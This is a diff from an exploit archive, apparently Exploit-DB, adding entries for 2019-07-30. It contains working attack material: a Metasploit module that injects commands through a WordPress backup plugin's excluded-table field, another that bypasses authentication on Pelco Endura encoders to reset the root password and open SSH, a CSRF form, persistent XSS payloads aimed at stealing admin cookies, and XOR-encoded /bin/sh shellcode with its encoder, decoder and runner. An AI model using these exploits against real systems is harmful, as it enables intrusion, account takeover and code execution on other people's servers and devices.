DB: 2019-07-30

6 changes to exploits/shellcodes

Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)
WP Database Backup < 5.2 - Remote Code Execution (Metasploit)
WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery
WordPress Theme Real Estate 2.8.9 - Cross-Site Scripting
GigToDo 1.3 - Cross-Site Scripting

Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode

exploits/php/remote/47187.rb

@@ -0,0 +1,194 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WP Database Backup RCE',
+      'Description'    => %q(
+        There exists a command injection vulnerability in the Wordpress plugin
+        `wp-database-backup` for versions < 5.2.
+
+        For the backup functionality, the plugin generates a `mysqldump` command
+        to execute. The user can choose specific tables to exclude from the backup
+        by setting the `wp_db_exclude_table` parameter in a POST request to the
+        `wp-database-backup` page. The names of the excluded tables are included in
+        the `mysqldump` command unsanitized. Arbitrary commands injected through the
+        `wp_db_exclude_table` parameter are executed each time the functionality
+        for creating a new database backup are run.
+
+        Authentication is required to successfully exploit this vulnerability.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Mikey Veenstra / Wordfence',  # Vulnerability Discovery
+        'Shelby Pace'                  # Metasploit module
+      ],
+      'References'     =>
+        [
+          [ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ],
+        ],
+      'Platform'       => [ 'win', 'linux' ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+        [
+          [
+            'Windows',
+            {
+              'Platform'        => 'win',
+              'Arch'            => [ ARCH_X86, ARCH_X64 ]
+            }
+          ],
+          [
+            'Linux',
+            {
+              'Platform'        =>  'linux',
+              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
+              'CmdStagerFlavor' =>  'printf'
+            }
+          ]
+        ],
+      'DisclosureDate' => '2019-04-24',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+    [
+      OptString.new('USERNAME', [ true, 'Wordpress username', '' ]),
+      OptString.new('PASSWORD', [ true, 'Wordpress password', '' ]),
+      OptString.new('TARGETURI', [ true, 'Base path to Wordpress installation', '/' ])
+    ])
+  end
+
+  def check
+    return CheckCode::Unknown unless wordpress_and_online?
+
+    changelog_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-database-backup', 'readme.txt')
+    res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  changelog_uri
+    )
+
+    if res && res.code == 200
+      version = res.body.match(/=+\s(\d+\.\d+)\.?\d*\s=/)
+      return CheckCode::Detected unless version && version.length > 1
+
+      vprint_status("Version of wp-database-backup detected: #{version[1]}")
+      return CheckCode::Appears if Gem::Version.new(version[1]) < Gem::Version.new('5.2')
+    end
+    CheckCode::Safe
+  end
+
+  def exploit
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+    fail_with(Failure::NoAccess, 'Unable to log into Wordpress') unless cookie
+
+    res = create_exclude_table(cookie)
+    nonce = get_nonce(res)
+    create_backup(cookie, nonce)
+
+    clear_exclude_table(cookie)
+  end
+
+  def create_exclude_table(cookie)
+    @exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php')
+    res = send_request_cgi(
+      'method'    =>  'GET',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_get'  =>  { 'page'  =>  'wp-database-backup' }
+    )
+
+    fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200
+    print_good('Reached the wp-database-backup settings page')
+    if datastore['TARGET'] == 1
+      comm_payload = generate_cmdstager(concat_operator: ' && ', temp: './')
+      comm_payload = comm_payload.join('&&')
+      comm_payload = comm_payload.gsub('\'', '')
+      comm_payload = "; #{comm_payload} ;"
+    else
+      comm_payload = " & #{cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true, encode_final_payload: true)} & ::"
+    end
+
+    table_res = send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_post' =>
+      {
+        'wpsetting'                       =>  'Save',
+        'wp_db_exclude_table[wp_comment]' =>  comm_payload
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to submit payload as an excluded table') unless table_res && table_res.code
+    print_good('Successfully added payload as an excluded table')
+
+    res.get_html_document
+  end
+
+  def get_nonce(response)
+    fail_with(Failure::UnexpectedReply, 'Failed to get a proper response') unless response
+
+    div_res = response.at('p[@class="submit"]')
+    fail_with(Failure::NotFound, 'Failed to find the element containing the nonce') unless div_res
+
+    wpnonce = div_res.to_s.match(/_wpnonce=([0-9a-z]*)/)
+    fail_with(Failure::NotFound, 'Failed to retrieve the wpnonce') unless wpnonce && wpnonce.length > 1
+
+    wpnonce[1]
+  end
+
+  def create_backup(cookie, nonce)
+    first_res = send_request_cgi(
+      'method'    =>  'GET',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_get'  =>
+      {
+        'page'      =>  'wp-database-backup',
+        '_wpnonce'  =>  nonce,
+        'action'    =>  'createdbbackup'
+      }
+    )
+
+    res = send_request_cgi(
+      'method'    =>  'GET',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_get'  =>
+      {
+        'page'          =>  'wp-database-backup',
+        'notification'  =>  'create'
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to create database backup') unless res && res.code == 200 && res.body.include?('Database Backup Created Successfully')
+    print_good('Successfully created a backup of the database')
+  end
+
+  def clear_exclude_table(cookie)
+    res = send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_post' =>
+      {
+        'wpsetting'                       =>  'Save',
+        'wp_db_exclude_table[wp_comment]' =>  'wp_comment'
+      }
+    )
+
+   fail_with(Failure::UnexpectedReply, 'Failed to delete the remove the payload from the excluded tables') unless res && res.code == 200
+   print_good('Successfully deleted the payload from the excluded tables list')
+  end
+end

exploits/php/webapps/47182.html

@@ -0,0 +1,24 @@
+# Exploit Title: Cross Site Request Forgery in Wordpress Simple Membership plugin
+# Date: 2019-07-27
+# Exploit Author: rubyman
+# Vendor Homepage: https://wordpress.org/plugins/simple-membership/
+# wpvulndb : https://wpvulndb.com/vulnerabilities/9482
+# Version: 3.8.4
+# Tested on: Windows 8.1
+# CVE : CVE-2019-14328
+
+#
+# Change localhost to your desired host
+#
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/wordpress/wp-admin/admin.php?page=simple_wp_membership&member_action=bulk" method="POST">
+      <input type="hidden" name="swpm&#95;bulk&#95;change&#95;level&#95;from" value="2" />
+      <input type="hidden" name="swpm&#95;bulk&#95;change&#95;level&#95;to" value="3" />
+      <input type="hidden" name="swpm&#95;bulk&#95;change&#95;level&#95;process" value="Bulk&#32;Change&#32;Membership&#32;Level" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

exploits/php/webapps/47184.txt

@@ -0,0 +1,33 @@
+# Exploit Title: Real Estate 7 - Real Estate WordPress Theme v2.8.9
+Persistent XSS Injection
+# Google Dork: inurl:"/wp-content/themes/realestate-7/"
+# Date: 2019/07/20
+# Author: m0ze
+# Vendor Homepage: https://contempothemes.com
+# Software Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
+# Version: <= 2.8.9
+# Tested on: NginX
+# CVE: -
+# CWE: CWE-79
+
+Details & Description:
+The «Real Estate 7» premium WordPress theme is vulnerable to persistent XSS
+injection that allows an attacker to inject JavaScript or HTML code into
+the website front-end.
+
+Special Note:
+- 7.151 Sales
+- If pre moderation is enabled, then u have a huge chance to steal an admin
+or moderator cookies.
+- U can edit any existed listing on the website by changing the unique ID
+-> https://site.com/edit-listing/?listings=XXX (where XXX is WordPress post
+ID, u can find it inside <body> tag class).
+
+PoC [Persistent XSS Injection]:
+First of all, register a new account as a seller or agent, log in and
+choose free membership package @ the dashboard. After that u'll be able to
+submit a new listing -> https://site.com/submit-listing/
+For persistent XSS injection u need to add ur payload inside the «Vitrual
+Tour Embed» text area (on the «DETAILS» step) and then press «Submit»
+button.
+Example: <img src="x" onerror="(alert)(`m0ze`)">

exploits/php/webapps/47185.txt

@@ -0,0 +1,39 @@
+# Exploit Title: GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection
+# Google Dork: -
+# Date: 2019/07/28
+# Author: m0ze
+# Vendor Homepage: https://www.gigtodoscript.com
+# Software Link: https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397
+# Version: <= 1.3
+# Tested on: NginX/1.15.10
+# CVE: -
+# CWE: CWE-79
+
+
+Details & Description:
+The «GigToDo - Freelance Marketplace Script» web-application is vulnerable
+to reflected and persistent XSS injections that allows an attacker to
+inject JavaScript/HTML code into the front-end, redirect visitor to another
+website or steal admin cookies.
+
+
+PoC [Persistent XSS Injection]:
+Register a new account, log in and go to the
+https://www.site.com/proposals/create_proposal page. Vulnerable text area
+is «Proposal's Description», so paste your payload inside, fill in other
+fields and save the data TWICE or your payload WILL NOT WORK. So literally
+paste your payload inside the «Proposal's Description» text area and scroll
+down to «Update Proposal» button, press it and your data will be saved.
+After that u'll be redirected to
+https://www.site.com/proposals/view_proposals.php page. Select your created
+proposal and press green square dropdown menu on the right («Actions»
+column) and click on «Edit» link. After that just don't change anything,
+scroll down to «Update Proposal» button, press it and your data will be
+saved ONE MORE TIME. That's it, now your payload will work.
+Example #1: <h1
+onmouseover=';alert(`m0ze`);'>m0ze</h1>1"--><svg/onload=';alert(`Script is
+fully protected from SQL Injection and XSS ©`);'><img src='x'
+onerror=';alert(`For sure lol`);'>
+Example #2: <h1 onmouseover=';alert(`Greetz from
+m0ze`);'>m0ze</h1>1"--><svg/onload=';window.location.replace(`
+https://twitter.com/m0ze_ru`);'>

exploits/unix/remote/47186.rb

@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Udp
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::SSH
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Schneider Electric Pelco Endura NET55XX Encoder",
+      'Description'    => %q(
+        This module exploits inadequate access controls within the webUI to enable
+        the SSH service and change the root password. This module has been tested successfully
+        on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Lucas Dinucci <idntk.lucdin@gmail.com>',
+          'Vitor Esperança <vitor@machiaveliclabs.com>'
+        ],
+      'References'     =>
+        [
+          ['CVE', '2019-6814'],
+          ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/']
+        ],
+      'Payload'        =>
+        {
+          'Compat' => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find'
+          }
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'     => [ [ "Universal", {} ] ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Jan 25 2019",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account', Rex::Text.rand_text_alphanumeric(16)]),
+        OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptInt.new('UDP_PORT', [ true, 'UDP port for the ONVIF service', 3702]),
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+  def new_password
+    datastore['NEW_PASSWORD']
+  end
+
+  def check
+    xmlPayload = '<?xml version="1.0" encoding="UTF-8"?>'\
+                 '<Envelope xmlns="http://www.w3.org/2003/05/soap-envelope">'\
+                 '<Header xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing">'\
+                 '<a:Action mustUnderstand="1">http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe</a:Action>'\
+                 '<a:MessageID>uuid:f3d577a3-431f-4450-ab45-b480042b9c74</a:MessageID>'\
+                 '<a:ReplyTo>'\
+                 '<a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>'\
+                 '</a:ReplyTo>'\
+                 '<a:To mustUnderstand="1">urn:schemas-xmlsoap-org:ws:2005:04:discovery</a:To>'\
+                 '</Header>'\
+                 '<Body>'\
+                 '<Probe xmlns="http://schemas.xmlsoap.org/ws/2005/04/discovery">'\
+                 '<Types xmlns:dp0="http://www.onvif.org/ver10/network/wsdl">dp0:NetworkVideoTransmitter</Types>'\
+                 '</Probe>'\
+                 '</Body>'\
+                 '</Envelope><?xml version="1.0" encoding="UTF-8"?>'
+
+    connect_udp(true, {'RPORT' => datastore['UDP_PORT']})
+    udp_sock.put(xmlPayload)
+    resp = []
+    resp << udp_sock.get(datastore['TIMEOUT'])
+    xmlResponse = resp.join(',')
+    disconnect_udp
+    if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508")
+      return Exploit::CheckCode::Appears
+    end
+     CheckCode::Safe
+  end
+
+  def change_password
+    print_status("#{peer} - Attempt to change the root password...")
+    post = {"enable": true, "passwd": new_password, "userid": "root"}.to_json
+
+    login = send_request_cgi({
+      'method' => 'POST',
+      'uri' =>  normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'),
+      'data' => post,
+      'headers' =>
+      {
+        'Cookie'        => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647',
+        'Content-Type'  => 'application/json;charset=utf-8'
+      }
+    }, timeout=datastore['TIMEOUT'])
+
+    fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200
+    print_good("#{rhost}:80 - Successfully changed the root password...")
+    print_good("#{rhost}:80 - New credentials: User: root / Password: #{new_password}")
+  end
+
+  def do_login
+    change_password
+    print_status("#{rhost}:22 - Attempt to start a SSH connection...")
+    factory = ssh_socket_factory
+    opts = {
+      :auth_methods    => ['password', 'keyboard-interactive'],
+      :port            => 22,
+      :use_agent       => false,
+      :config          => true,
+      :password        => new_password,
+      :proxy           => factory,
+      :non_interactive => true,
+      :verify_host_key => :never
+    }
+    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(datastore['RHOST'], 'root', opts)
+      end
+    rescue Rex::ConnectionError
+    rescue Net::SSH::Disconnect, ::EOFError
+      print_error "#{rhost}:22 SSH - Disconnected during negotiation"
+    rescue ::Timeout::Error
+      print_error "#{rhost}:22 SSH - Timed out during negotiation"
+    rescue Net::SSH::AuthenticationFailed
+      print_error "#{rhost}:22 SSH - Failed authentication"
+    rescue Net::SSH::Exception => e
+      print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}"
+    end
+    if ssh
+      conn = Net::SSH::CommandStream.new(ssh)
+      return conn
+    end
+  end
+
+  def exploit
+    conn = do_login
+    if conn
+      print_good("#{rhost}:22 - Session established ")
+      handler(conn.lsock)
+    end
+  end
+end

files_exploits.csv

@@ -17582,6 +17582,8 @@ id,file,description,date,author,type,platform,port
 47130,exploits/windows/remote/47130.txt,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow",2019-07-17,hyp3rlinx,remote,windows,
 47137,exploits/windows_x86/remote/47137.py,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)",2019-07-19,sasaga92,remote,windows_x86,
 47155,exploits/multiple/remote/47155.txt,"Trend Micro Deep Discovery Inspector IDS - Security Bypass",2019-07-24,hyp3rlinx,remote,multiple,
+47186,exploits/unix/remote/47186.rb,"Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)",2019-07-29,Metasploit,remote,unix,
+47187,exploits/php/remote/47187.rb,"WP Database Backup < 5.2 - Remote Code Execution (Metasploit)",2019-07-29,Metasploit,remote,php,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41555,3 +41557,6 @@ id,file,description,date,author,type,platform,port
 47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution",2019-07-26,"Wietse Boonstra",webapps,jsp,
 47180,exploits/jsp/webapps/47180.rb,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)",2019-07-26,"Wietse Boonstra",webapps,jsp,443
 47181,exploits/jsp/webapps/47181.txt,"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection",2019-07-26,"Wietse Boonstra",webapps,jsp,80
+47182,exploits/php/webapps/47182.html,"WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery",2019-07-29,rubyman,webapps,php,80
+47184,exploits/php/webapps/47184.txt,"WordPress Theme Real Estate 2.8.9 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80
+47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80

files_shellcodes.csv

@@ -989,3 +989,4 @@ id,file,description,date,author,type,platform
 47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86
 47108,shellcodes/linux_x86/47108.txt,"Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)",2019-07-12,"Xavier Invers Fornells",shellcode,linux_x86
 47151,shellcodes/linux_x86-64/47151.c,"Linux/x86_64 - Wget Linux Enumeration Script Shellcode (155 Bytes)",2019-07-23,"Kağan Çapar",shellcode,linux_x86-64
+47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode",2019-07-29,"Pedro Cabral",shellcode,linux_x86-64

shellcodes/linux_x86-64/47183.c

@@ -0,0 +1,167 @@
+/*
+######################################## description ########################################
+
+; Title     : X64 [NOT +SHIFT-N+ XOR-N] encoded /bin/sh - shellcode
+; Author    : Pedro Cabral
+; Twitter   : @CabrallPedro
+; LinkedIn  : https://www.linkedin.com/in/pedro-cabral1992
+; SLAE ID   : SLAE64 - 1603
+; Purpose   : spawn /bin/sh shell
+; Tested On : Ubuntu 16.04.6 LTS
+; Arch      : x64
+; Size      : 168 bytes
+
+########################################## sh.asm ###########################################
+
+global _start
+
+section .text
+
+_start:
+        xor rax, rax
+        push rax ; push null
+        mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse
+        push rbx ; push to the stack
+        mov rdi, rsp ; store the /bin//sh on rdi
+        push rax ; push null
+        mov rdx, rsp ; set rdx
+        push rdi ; push the address of /bin//sh
+        mov rsi, rsp ; set rsi
+        add rax, 59 ; rax = 59 (execve)
+        syscall
+
+
+#################################### original shellcode #####################################
+
+pedro@ubuntu>nasm -felf64 sh.asm -o sh.o
+pedro@ubuntu>ld -N -o sh sh.o
+pedro@ubuntu>echo;objdump -d ./sh.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo
+
+"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"
+
+
+########################################  encode.py  ########################################
+
+#!/usr/bin/python
+
+import sys
+
+if len(sys.argv) != 3:
+        print "Usage : python encode.py <SHIFT number> <XOR number>"
+        sys.exit(0)
+
+shift   = int(sys.argv[1])
+xor     = int(sys.argv[2])
+
+shellcode = ("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05")
+
+
+# addition to the inicial of the shellcode the SHIFT and XOR values
+encoded_shellcode =""
+encoded_shellcode += '0x01' #prevent null bytes on the shellcode 
+encoded_shellcode += '%02x, ' %shift
+encoded_shellcode += '0x'
+encoded_shellcode += '%02x, ' %xor
+
+# [NOT + SHL-N + XOR-N] encoded shellcode
+for i in bytearray(shellcode):
+	new = ~i & 0xff
+	new = new << shift
+        new = new ^ xor
+        encoded_shellcode += '0x'
+        encoded_shellcode += '%02x, ' %new
+
+# end of shellcode
+encoded_shellcode += '0x'
+encoded_shellcode += '%02x, ' %xor
+encoded_shellcode += '0x'
+encoded_shellcode += '%02x' %xor
+
+# print encoded shellcode
+print encoded_shellcode
+
+#################################### Encoded Shellcode  #####################################
+
+pedro@ubuntu>python encoder.py 4 1337
+0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539
+
+####################################### decoder.asm  ########################################
+
+global _start
+
+section .text
+
+_start:
+
+	jmp decoder
+	encoded : dw 0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539
+
+decoder:
+	lea rsi, [rel encoded]
+
+	xor rcx, rcx
+	xor r9,r9
+	xor r10,r10
+
+	mov word cx, [rsi]
+	inc rsi
+	inc rsi
+	mov word r9w, [rsi]
+	inc rsi
+	inc rsi
+	push rsi
+	mov rdi, rsi
+main: ; 			to deal with 0xff on the original shellcode
+	mov word r10w,[rsi]
+	xor r10w, r9w
+	jz second_check
+main2:
+	shr r10, cl
+	not word r10w
+	mov byte [rdi], r10b
+	inc rsi
+	inc rsi
+	inc rdi
+	jmp short main
+
+second_check:
+	mov word r10w, [rsi+2]
+	xor r10w, r9w
+	jz call_encoded
+	mov word r10w, [rsi]
+	xor r10w, r9w
+	jmp main2
+
+call_encoded:
+	call [rsp]
+
+###################################### final shellcode ######################################
+
+pedro@ubuntu>nasm -felf64 decoder.asm -o decoder.o
+pedro@ubuntu>echo;objdump -d ./decoder.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo
+
+"\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24"
+
+pedro@ubuntu>gcc -fno-stack-protector -z execstack testShellcode.c -o testShellcode
+pedro@ubuntu>./testShellcode 
+Shellcode Length:	168
+$ whoami
+pedro
+*/
+
+
+#include<stdio.h>
+#include<string.h>
+
+
+unsigned char code[] = \
+"\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24";
+
+void main(){
+	printf("Shellcode Length:	%zu\n",strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}